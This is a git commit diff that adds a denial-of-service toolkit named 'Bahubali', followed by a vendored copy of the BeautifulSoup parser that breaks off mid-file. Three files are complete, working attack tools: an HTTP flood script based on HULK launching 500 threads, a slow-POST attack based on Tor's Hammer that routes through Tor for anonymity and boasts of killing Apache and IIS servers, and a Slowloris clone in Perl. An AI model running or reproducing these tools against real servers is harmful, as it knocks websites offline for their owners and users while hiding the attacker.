aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorN3V0N <navanchauhan@gmail.com>2017-07-22 14:19:57 +0530
committerGitHub <noreply@github.com>2017-07-22 14:19:57 +0530
commit14d526c1f70a42fb0daab22fd76b2c16d1bcc4ad (patch)
tree787926bc961ed9d2f51017116b7ef2ea80287132
parent5fa27bdc28e6cf05e9ef413d0f9e77c111e16a18 (diff)
the code
-rw-r--r--src/1.py153
-rw-r--r--src/2.py185
-rw-r--r--src/3.pl364
-rw-r--r--src/BeautifulSoup.py2000
-rw-r--r--src/BeautifulSoup.pycbin0 -> 68629 bytes
-rw-r--r--src/bahubali99
-rw-r--r--src/socks.py387
-rw-r--r--src/socks.pycbin0 -> 15317 bytes
-rw-r--r--src/terminal.py185
-rw-r--r--src/terminal.pycbin0 -> 6885 bytes
10 files changed, 3373 insertions, 0 deletions
diff --git a/src/1.py b/src/1.py
new file mode 100644
index 0000000..b5cb921
--- /dev/null
+++ b/src/1.py
@@ -0,0 +1,153 @@
+# ----------------------------------------------------------------------------------------------
+# Bahubali Tool No 1
+#
+# Based on Hulk by Barry
+#
+# By: N3V0N
+# ----------------------------------------------------------------------------------------------
+import urllib2
+import sys
+import threading
+import random
+import re
+
+#global params
+url=''
+host=''
+headers_useragents=[]
+headers_referers=[]
+request_counter=0
+flag=0
+safe=0
+
+def inc_counter():
+ global request_counter
+ request_counter+=1
+
+def set_flag(val):
+ global flag
+ flag=val
+
+def set_safe():
+ global safe
+ safe=1
+
+# generates a user agent array
+def useragent_list():
+ global headers_useragents
+ headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
+ headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
+ headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
+ headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
+ return(headers_useragents)
+
+# generates a referer array
+def referer_list():
+ global headers_referers
+ headers_referers.append('http://www.google.com/?q=')
+ headers_referers.append('http://www.usatoday.com/search/results?q=')
+ headers_referers.append('http://engadget.search.aol.com/search?q=')
+ headers_referers.append('http://' + host + '/')
+ return(headers_referers)
+
+#builds random ascii string
+def buildblock(size):
+ out_str = ''
+ for i in range(0, size):
+ a = random.randint(65, 90)
+ out_str += chr(a)
+ return(out_str)
+
+def usage():
+ print '---------------------------------------------------'
+ print 'USAGE: python hulk.py <url>'
+ print 'you can add "safe" after url, to autoshut after dos'
+ print '---------------------------------------------------'
+
+
+#http request
+def httpcall(url):
+ useragent_list()
+ referer_list()
+ code=0
+ if url.count("?")>0:
+ param_joiner="&"
+ else:
+ param_joiner="?"
+ request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
+ request.add_header('User-Agent', random.choice(headers_useragents))
+ request.add_header('Cache-Control', 'no-cache')
+ request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
+ request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
+ request.add_header('Keep-Alive', random.randint(110,120))
+ request.add_header('Connection', 'keep-alive')
+ request.add_header('Host',host)
+ try:
+ urllib2.urlopen(request)
+ except urllib2.HTTPError, e:
+ #print e.code
+ set_flag(1)
+ print 'Response Code 500'
+ code=500
+ except urllib2.URLError, e:
+ #print e.reason
+ sys.exit()
+ else:
+ inc_counter()
+ urllib2.urlopen(request)
+ return(code)
+
+
+#http caller thread
+class HTTPThread(threading.Thread):
+ def run(self):
+ try:
+ while flag<2:
+ code=httpcall(url)
+ if (code==500) & (safe==1):
+ set_flag(2)
+ except Exception, ex:
+ pass
+
+# monitors http threads and counts requests
+class MonitorThread(threading.Thread):
+ def run(self):
+ previous=request_counter
+ while flag==0:
+ if (previous+100<request_counter) & (previous<>request_counter):
+ print "%d Requests Sent" % (request_counter)
+ previous=request_counter
+ if flag==2:
+ print "\n-- Attack Finished --"
+
+#execute
+if len(sys.argv) < 2:
+ usage()
+ sys.exit()
+else:
+ if sys.argv[1]=="help":
+ usage()
+ sys.exit()
+ else:
+ print "-- Attack Initiated --"
+ if len(sys.argv)== 3:
+ if sys.argv[2]=="safe":
+ set_safe()
+ url = sys.argv[1]
+ if url.count("/")==2:
+ url = url + "/"
+ m = re.search('http\://([^/]*)/?.*', url)
+ host = m.group(1)
+ for i in range(500):
+ t = HTTPThread()
+ t.start()
+ t = MonitorThread()
+ t.start()
diff --git a/src/2.py b/src/2.py
new file mode 100644
index 0000000..eadcd39
--- /dev/null
+++ b/src/2.py
@@ -0,0 +1,185 @@
+#!/usr/bin/python
+
+"""
+Bahubali Tool 2 - Slow POST Denial Of Service Testing Tool
+Version 0.9
+Based on Tor's Hammer
+
+Tool No 2 is a slow post dos testing tool written in Python.
+It runs through the Tor network to be anonymized.
+Kills most unprotected web servers running Apache and IIS via a single instance.
+Kills Apache 1.X and older IIS with ~128 threads.
+Kills newer IIS and Apache 2.X with ~256 threads.
+"""
+
+import os
+import re
+import time
+import sys
+import random
+import math
+import getopt
+import socks
+import string
+import terminal
+
+from threading import Thread
+
+global stop_now
+global term
+
+stop_now = False
+term = terminal.TerminalController()
+
+useragents = [
+ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
+ "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
+ "Googlebot/2.1 (http://www.googlebot.com/bot.html)",
+ "Opera/9.20 (Windows NT 6.0; U; en)",
+ "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
+ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)",
+ "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0",
+ "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
+ "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)", # maybe not
+ "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13",
+ "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
+ "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
+ "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
+ "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)",
+ "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)",
+ "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8",
+ "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
+ "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
+ "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
+ "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)"
+]
+
+class httpPost(Thread):
+ def __init__(self, host, port, tor):
+ Thread.__init__(self)
+ self.host = host
+ self.port = port
+ self.socks = socks.socksocket()
+ self.tor = tor
+ self.running = True
+
+ def _send_http_post(self, pause=10):
+ global stop_now
+
+ self.socks.send("POST / HTTP/1.1\r\n"
+ "Host: %s\r\n"
+ "User-Agent: %s\r\n"
+ "Connection: keep-alive\r\n"
+ "Keep-Alive: 900\r\n"
+ "Content-Length: 10000\r\n"
+ "Content-Type: application/x-www-form-urlencoded\r\n\r\n" %
+ (self.host, random.choice(useragents)))
+
+ for i in range(0, 9999):
+ if stop_now:
+ self.running = False
+ break
+ p = random.choice(string.letters+string.digits)
+ print term.BOL+term.UP+term.CLEAR_EOL+"Posting: %s" % p+term.NORMAL
+ self.socks.send(p)
+ time.sleep(random.uniform(0.1, 3))
+
+ self.socks.close()
+
+ def run(self):
+ while self.running:
+ while self.running:
+ try:
+ if self.tor:
+ self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
+ self.socks.connect((self.host, self.port))
+ print term.BOL+term.UP+term.CLEAR_EOL+"Connected to host..."+ term.NORMAL
+ break
+ except Exception, e:
+ if e.args[0] == 106 or e.args[0] == 60:
+ break
+ print term.BOL+term.UP+term.CLEAR_EOL+"Error connecting to host..."+ term.NORMAL
+ time.sleep(1)
+ continue
+
+ while self.running:
+ try:
+ self._send_http_post()
+ except Exception, e:
+ if e.args[0] == 32 or e.args[0] == 104:
+ print term.BOL+term.UP+term.CLEAR_EOL+"Thread broken, restarting..."+ term.NORMAL
+ self.socks = socks.socksocket()
+ break
+ time.sleep(0.1)
+ pass
+
+def usage():
+ print "./1.py -t <target> [-r <threads> -p <port> -T -h]"
+ print " -t|--target <Hostname|IP>"
+ print " -r|--threads <Number of threads> Defaults to 256"
+ print " -p|--port <Web Server Port> Defaults to 80"
+ print " -h|--help Shows this help\n"
+
+def main(argv):
+
+ try:
+ opts, args = getopt.getopt(argv, "hTt:r:p:", ["help", "tor", "target=", "threads=", "port="])
+ except getopt.GetoptError:
+ usage()
+ sys.exit(-1)
+
+ global stop_now
+
+ target = ''
+ threads = 256
+ tor = False
+ port = 80
+
+ for o, a in opts:
+ if o in ("-h", "--help"):
+ usage()
+ sys.exit(0)
+ if o in ("-T", "--tor"):
+ tor = True
+ elif o in ("-t", "--target"):
+ target = a
+ elif o in ("-r", "--threads"):
+ threads = int(a)
+ elif o in ("-p", "--port"):
+ port = int(a)
+
+ if target == '' or int(threads) <= 0:
+ usage()
+ sys.exit(-1)
+
+ print term.DOWN + term.RED + "/*" + term.NORMAL
+ print term.RED + " * Target: %s Port: %d" % (target, port) + term.NORMAL
+ print term.RED + " * Threads: %d Tor: %s" % (threads, tor) + term.NORMAL
+ print term.RED + " * Give 20 seconds without tor or 40 with before checking site" + term.NORMAL
+ print term.RED + " */" + term.DOWN + term.DOWN + term.NORMAL
+
+ rthreads = []
+ for i in range(threads):
+ t = httpPost(target, port, tor)
+ rthreads.append(t)
+ t.start()
+
+ while len(rthreads) > 0:
+ try:
+ rthreads = [t.join(1) for t in rthreads if t is not None and t.isAlive()]
+ except KeyboardInterrupt:
+ print "\nShutting down threads...\n"
+ for t in rthreads:
+ stop_now = True
+ t.running = False
+
+if __name__ == "__main__":
+ print "\n/*"
+ print " *"+term.RED + " Bahubali Tool 2 "+term.NORMAL
+ print " * Slow POST DoS Testing Tool"
+ print " * Version 0.9"
+ print " * Anonymized via Tor"
+ print " */\n"
+
+ main(sys.argv[1:])
+
diff --git a/src/3.pl b/src/3.pl
new file mode 100644
index 0000000..289a713
--- /dev/null
+++ b/src/3.pl
@@ -0,0 +1,364 @@
+#!/usr/bin/perl -w
+use strict;
+use IO::Socket::INET;
+use IO::Socket::SSL;
+use Getopt::Long;
+use Config;
+
+$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
+
+print <<EOTEXT;
+Welcome to Bahubali Tool No 3, Based on Slowloris by Laera Loris
+EOTEXT
+
+my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
+my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
+my $result = GetOptions(
+ 'shost=s' => \$shost,
+ 'dns=s' => \$host,
+ 'httpready' => \$httpready,
+ 'num=i' => \$connections,
+ 'cache' => \$cache,
+ 'port=i' => \$port,
+ 'https' => \$ssl,
+ 'tcpto=i' => \$tcpto,
+ 'test' => \$test,
+ 'timeout=i' => \$timeout,
+ 'version' => \$version,
+);
+
+if ($version) {
+ print "Version 0.9\n";
+ exit;
+}
+
+unless ($host) {
+ print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
+ print "\n\tType 'perldoc $0' for help with options.\n\n";
+ exit;
+}
+
+unless ($port) {
+ $port = 80;
+ print "Defaulting to port 80.\n";
+}
+
+unless ($tcpto) {
+ $tcpto = 5;
+ print "Defaulting to a 5 second tcp connection timeout.\n";
+}
+
+unless ($test) {
+ unless ($timeout) {
+ $timeout = 100;
+ print "Defaulting to a 100 second re-try timeout.\n";
+ }
+ unless ($connections) {
+ $connections = 1000;
+ print "Defaulting to 1000 connections.\n";
+ }
+}
+
+my $usemultithreading = 0;
+if ( $Config{usethreads} ) {
+ print "Multithreading enabled.\n";
+ $usemultithreading = 1;
+ use threads;
+ use threads::shared;
+}
+else {
+ print "No multithreading capabilites found!\n";
+ print "The tool will be slower than normal as a result.\n";
+}
+
+my $packetcount : shared = 0;
+my $failed : shared = 0;
+my $connectioncount : shared = 0;
+
+srand() if ($cache);
+
+if ($shost) {
+ $sendhost = $shost;
+}
+else {
+ $sendhost = $host;
+}
+if ($httpready) {
+ $method = "POST";
+}
+else {
+ $method = "GET";
+}
+
+if ($test) {
+ my @times = ( "2", "30", "90", "240", "500" );
+ my $totaltime = 0;
+ foreach (@times) {
+ $totaltime = $totaltime + $_;
+ }
+ $totaltime = $totaltime / 60;
+ print "Thie test could take up to $totaltime minutes.\n";
+
+ my $delay = 0;
+ my $working = 0;
+ my $sock;
+
+ if ($ssl) {
+ if (
+ $sock = new IO::Socket::SSL(
+ PeerAddr => "$host",
+ PeerPort => "$port",
+ Timeout => "$tcpto",
+ Proto => "tcp",
+ )
+ )
+ {
+ $working = 1;
+ }
+ }
+ else {
+ if (
+ $sock = new IO::Socket::INET(
+ PeerAddr => "$host",
+ PeerPort => "$port",
+ Timeout => "$tcpto",
+ Proto => "tcp",
+ )
+ )
+ {
+ $working = 1;
+ }
+ }
+ if ($working) {
+ if ($cache) {
+ $rand = "?" . int( rand(99999999999999) );
+ }
+ else {
+ $rand = "";
+ }
+ my $primarypayload =
+ "GET /$rand HTTP/1.1\r\n"
+ . "Host: $sendhost\r\n"
+ . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
+ . "Content-Length: 42\r\n";
+ if ( print $sock $primarypayload ) {
+ print "Connection successful, now comes the waiting game...\n";
+ }
+ else {
+ print
+"That's odd - I connected but couldn't send the data to $host:$port.\n";
+ print "Is something wrong?\nDying.\n";
+ exit;
+ }
+ }
+ else {
+ print "Can't connect to $host:$port.\n";
+ print "Is something wrong?\nDying.\n";
+ exit;
+ }
+ for ( my $i = 0 ; $i <= $#times ; $i++ ) {
+ print "Trying a $times[$i] second delay: \n";
+ sleep( $times[$i] );
+ if ( print $sock "X-a: b\r\n" ) {
+ print "\tWorked.\n";
+ $delay = $times[$i];
+ }
+ else {
+ if ( $SIG{__WARN__} ) {
+ $delay = $times[ $i - 1 ];
+ last;
+ }
+ print "\tFailed after $times[$i] seconds.\n";
+ }
+ }
+
+ if ( print $sock "Connection: Close\r\n\r\n" ) {
+ print "Okay that's enough time. Slowloris closed the socket.\n";
+ print "Use $delay seconds for -timeout.\n";
+ exit;
+ }
+ else {
+ print "Remote server closed socket.\n";
+ print "Use $delay seconds for -timeout.\n";
+ exit;
+ }
+ if ( $delay < 166 ) {
+ print <<EOSUCKS2BU;
+Since the timeout ended up being so small ($delay seconds) and it generally
+takes between 200-500 threads for most servers and assuming any latency at
+all... you might have trouble using Slowloris against this target. You can
+tweak the -timeout flag down to less than 10 seconds but it still may not
+build the sockets in time.
+EOSUCKS2BU
+ }
+}
+else {
+ print
+"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
+
+ if ($usemultithreading) {
+ domultithreading($connections);
+ }
+ else {
+ doconnections( $connections, $usemultithreading );
+ }
+}
+
+sub doconnections {
+ my ( $num, $usemultithreading ) = @_;
+ my ( @first, @sock, @working );
+ my $failedconnections = 0;
+ $working[$_] = 0 foreach ( 1 .. $num ); #initializing
+ $first[$_] = 0 foreach ( 1 .. $num ); #initializing
+ while (1) {
+ $failedconnections = 0;
+ print "\t\tBuilding sockets.\n";
+ foreach my $z ( 1 .. $num ) {
+ if ( $working[$z] == 0 ) {
+ if ($ssl) {
+ if (
+ $sock[$z] = new IO::Socket::SSL(
+ PeerAddr => "$host",
+ PeerPort => "$port",
+ Timeout => "$tcpto",
+ Proto => "tcp",
+ )
+ )
+ {
+ $working[$z] = 1;
+ }
+ else {
+ $working[$z] = 0;
+ }
+ }
+ else {
+ if (
+ $sock[$z] = new IO::Socket::INET(
+ PeerAddr => "$host",
+ PeerPort => "$port",
+ Timeout => "$tcpto",
+ Proto => "tcp",
+ )
+ )
+ {
+ $working[$z] = 1;
+ $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
+ }
+ else {
+ $working[$z] = 0;
+ }
+ }
+ if ( $working[$z] == 1 ) {
+ if ($cache) {
+ $rand = "?" . int( rand(99999999999999) );
+ }
+ else {
+ $rand = "";
+ }
+ my $primarypayload =
+ "$method /$rand HTTP/1.1\r\n"
+ . "Host: $sendhost\r\n"
+ . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
+ . "Content-Length: 42\r\n";
+ my $handle = $sock[$z];
+ if ($handle) {
+ print $handle "$primarypayload";
+ if ( $SIG{__WARN__} ) {
+ $working[$z] = 0;
+ close $handle;
+ $failed++;
+ $failedconnections++;
+ }
+ else {
+ $packetcount++;
+ $working[$z] = 1;
+ }
+ }
+ else {
+ $working[$z] = 0;
+ $failed++;
+ $failedconnections++;
+ }
+ }
+ else {
+ $working[$z] = 0;
+ $failed++;
+ $failedconnections++;
+ }
+ }
+ }
+ print "\t\tSending data.\n";
+ foreach my $z ( 1 .. $num ) {
+ if ( $working[$z] == 1 ) {
+ if ( $sock[$z] ) {
+ my $handle = $sock[$z];
+ if ( print $handle "X-a: b\r\n" ) {
+ $working[$z] = 1;
+ $packetcount++;
+ }
+ else {
+ $working[$z] = 0;
+ #debugging info
+ $failed++;
+ $failedconnections++;
+ }
+ }
+ else {
+ $working[$z] = 0;
+ #debugging info
+ $failed++;
+ $failedconnections++;
+ }
+ }
+ }
+ print
+"Current stats:\tThe tool has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
+ sleep($timeout);
+ }
+}
+
+sub domultithreading {
+ my ($num) = @_;
+ my @thrs;
+ my $i = 0;
+ my $connectionsperthread = 50;
+ while ( $i < $num ) {
+ $thrs[$i] =
+ threads->create( \&doconnections, $connectionsperthread, 1 );
+ $i += $connectionsperthread;
+ }
+ my @threadslist = threads->list();
+ while ( $#threadslist > 0 ) {
+ $failed = 0;
+ }
+}
+
+__END__
+
+=head1 TITLE
+
+Bahubali Tool 3 by N3V0N
+
+=head1 VERSION
+
+Version 0.9 Stable
+
+=head1 DATE
+
+22/07/17
+
+=head1 AUTHOR
+
+Navan Chauhan <navanchauhan@gmail.com>
+
+=head1 ABSTRACT
+
+Based on Slowloris
+
+=head1 AFFECTS
+
+Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?
+
+=head1 NOT AFFECTED
+
+IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
diff --git a/src/BeautifulSoup.py b/src/BeautifulSoup.py
new file mode 100644
index 0000000..34204e7
--- /dev/null
+++ b/src/BeautifulSoup.py
@@ -0,0 +1,2000 @@
+"""Beautiful Soup
+Elixir and Tonic
+"The Screen-Scraper's Friend"
+http://www.crummy.com/software/BeautifulSoup/
+
+Beautiful Soup parses a (possibly invalid) XML or HTML document into a
+tree representation. It provides methods and Pythonic idioms that make
+it easy to navigate, search, and modify the tree.
+
+A well-formed XML/HTML document yields a well-formed data
+structure. An ill-formed XML/HTML document yields a correspondingly
+ill-formed data structure. If your document is only locally
+well-formed, you can use this library to find and process the
+well-formed part of it.
+
+Beautiful Soup works with Python 2.2 and up. It has no external
+dependencies, but you'll have more success at converting data to UTF-8
+if you also install these three packages:
+
+* chardet, for auto-detecting character encodings
+ http://chardet.feedparser.org/
+* cjkcodecs and iconv_codec, which add more encodings to the ones supported
+ by stock Python.
+ http://cjkpython.i18n.org/
+
+Beautiful Soup defines classes for two main parsing strategies:
+
+ * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific
+ language that kind of looks like XML.
+
+ * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid
+ or invalid. This class has web browser-like heuristics for
+ obtaining a sensible parse tree in the face of common HTML errors.
+
+Beautiful Soup also defines a class (UnicodeDammit) for autodetecting
+the encoding of an HTML or XML document, and converting it to
+Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser.
+
+For more than you ever wanted to know about Beautiful Soup, see the
+documentation:
+http://www.crummy.com/software/BeautifulSoup/documentation.html
+
+Here, have some legalese:
+
+Copyright (c) 2004-2009, Leonard Richardson
+
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are
+met:
+
+ * Redistributions of source code must retain the above copyright
+ notice, this list of conditions and the following disclaimer.
+
+ * Redistributions in binary form must reproduce the above
+ copyright notice, this list of conditions and the following
+ disclaimer in the documentation and/or other materials provided
+ with the distribution.
+
+ * Neither the name of the the Beautiful Soup Consortium and All
+ Night Kosher Bakery nor the names of its contributors may be
+ used to endorse or promote products derived from this software
+ without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
+CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
+EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
+PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
+PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
+LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
+NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT.
+
+"""
+from __future__ import generators
+
+__author__ = "Leonard Richardson (leonardr@segfault.org)"
+__version__ = "3.1.0.1"
+__copyright__ = "Copyright (c) 2004-2009 Leonard Richardson"
+__license__ = "New-style BSD"
+
+import codecs
+import markupbase
+import types
+import re
+from HTMLParser import HTMLParser, HTMLParseError
+try:
+ from htmlentitydefs import name2codepoint
+except ImportError:
+ name2codepoint = {}
+try:
+ set
+except NameError:
+ from sets import Set as set
+
+#These hacks make Beautiful Soup able to parse XML with namespaces
+markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match
+
+DEFAULT_OUTPUT_ENCODING = "utf-8"
+
+# First, the classes that represent markup elements.
+
+def sob(unicode, encoding):
+ """Returns either the given Unicode string or its encoding."""
+ if encoding is None:
+ return unicode
+ else:
+ return unicode.encode(encoding)
+
+class PageElement:
+ """Contains the navigational information for some part of the page
+ (either a tag or a piece of text)"""
+
+ def setup(self, parent=None, previous=None):
+ """Sets up the initial relations between this element and
+ other elements."""
+ self.parent = parent
+ self.previous = previous
+ self.next = None
+ self.previousSibling = None
+ self.nextSibling = None
+ if self.parent and self.parent.contents:
+ self.previousSibling = self.parent.contents[-1]
+ self.previousSibling.nextSibling = self
+
+ def replaceWith(self, replaceWith):
+ oldParent = self.parent
+ myIndex = self.parent.contents.index(self)
+ if hasattr(replaceWith, 'parent') and replaceWith.parent == self.parent:
+ # We're replacing this element with one of its siblings.
+ index = self.parent.contents.index(replaceWith)
+ if index and index < myIndex:
+ # Furthermore, it comes before this element. That
+ # means that when we extract it, the index of this
+ # element will change.
+ myIndex = myIndex - 1
+ self.extract()
+ oldParent.insert(myIndex, replaceWith)
+
+ def extract(self):
+ """Destructively rips this element out of the tree."""
+ if self.parent:
+ try:
+ self.parent.contents.remove(self)
+ except ValueError:
+ pass
+
+ #Find the two elements that would be next to each other if
+ #this element (and any children) hadn't been parsed. Connect
+ #the two.
+ lastChild = self._lastRecursiveChild()
+ nextElement = lastChild.next
+
+ if self.previous:
+ self.previous.next = nextElement
+ if nextElement:
+ nextElement.previous = self.previous
+ self.previous = None
+ lastChild.next = None
+
+ self.parent = None
+ if self.previousSibling:
+ self.previousSibling.nextSibling = self.nextSibling
+ if self.nextSibling:
+ self.nextSibling.previousSibling = self.previousSibling
+ self.previousSibling = self.nextSibling = None
+ return self
+
+ def _lastRecursiveChild(self):
+ "Finds the last element beneath this object to be parsed."
+ lastChild = self
+ while hasattr(lastChild, 'contents') and lastChild.contents:
+ lastChild = lastChild.contents[-1]
+ return lastChild
+
+ def insert(self, position, newChild):
+ if (isinstance(newChild, basestring)
+ or isinstance(newChild, unicode)) \
+ and not isinstance(newChild, NavigableString):
+ newChild = NavigableString(newChild)
+
+ position = min(position, len(self.contents))
+ if hasattr(newChild, 'parent') and newChild.parent != None:
+ # We're 'inserting' an element that's already one
+ # of this object's children.
+ if newChild.parent == self:
+ index = self.find(newChild)
+ if index and index < position:
+ # Furthermore we're moving it further down the
+ # list of this object's children. That means that
+ # when we extract this element, our target index
+ # will jump down one.
+ position = position - 1
+ newChild.extract()
+
+ newChild.parent = self
+ previousChild = None
+ if position == 0:
+ newChild.previousSibling = None
+ newChild.previous = self
+ else:
+ previousChild = self.contents[position-1]
+ newChild.previousSibling = previousChild
+ newChild.previousSibling.nextSibling = newChild
+ newChild.previous = previousChild._lastRecursiveChild()
+ if newChild.previous:
+ newChild.previous.next = newChild
+
+ newChildsLastElement = newChild._lastRecursiveChild()
+
+ if position >= len(self.contents):
+ newChild.nextSibling = None
+
+ parent = self
+ parentsNextSibling = None
+ while not parentsNextSibling:
+ parentsNextSibling = parent.nextSibling
+ parent = parent.parent
+ if not parent: # This is the last element in the document.
+ break
+ if parentsNextSibling:
+ newChildsLastElement.next = parentsNextSibling
+ else:
+ newChildsLastElement.next = None
+ else:
+ nextChild = self.contents[position]
+ newChild.nextSibling = nextChild
+ if newChild.nextSibling:
+ newChild.nextSibling.previousSibling = newChild
+ newChildsLastElement.next = nextChild
+
+ if newChildsLastElement.next:
+ newChildsLastElement.next.previous = newChildsLastElement
+ self.contents.insert(position, newChild)
+
+ def append(self, tag):
+ """Appends the given tag to the contents of this tag."""
+ self.insert(len(self.contents), tag)
+
+ def findNext(self, name=None, attrs={}, text=None, **kwargs):
+ """Returns the first item that matches the given criteria and
+ appears after this Tag in the document."""
+ return self._findOne(self.findAllNext, name, attrs, text, **kwargs)
+
+ def findAllNext(self, name=None, attrs={}, text=None, limit=None,
+ **kwargs):
+ """Returns all items that match the given criteria and appear
+ after this Tag in the document."""
+ return self._findAll(name, attrs, text, limit, self.nextGenerator,
+ **kwargs)
+
+ def findNextSibling(self, name=None, attrs={}, text=None, **kwargs):
+ """Returns the closest sibling to this Tag that matches the
+ given criteria and appears after this Tag in the document."""
+ return self._findOne(self.findNextSiblings, name, attrs, text,
+ **kwargs)
+
+ def findNextSiblings(self, name=None, attrs={}, text=None, limit=None,
+ **kwargs):
+ """Returns the siblings of this Tag that match the given
+ criteria and appear after this Tag in the document."""
+ return self._findAll(name, attrs, text, limit,
+ self.nextSiblingGenerator, **kwargs)
+ fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x
+
+ def findPrevious(self, name=None, attrs={}, text=None, **kwargs):
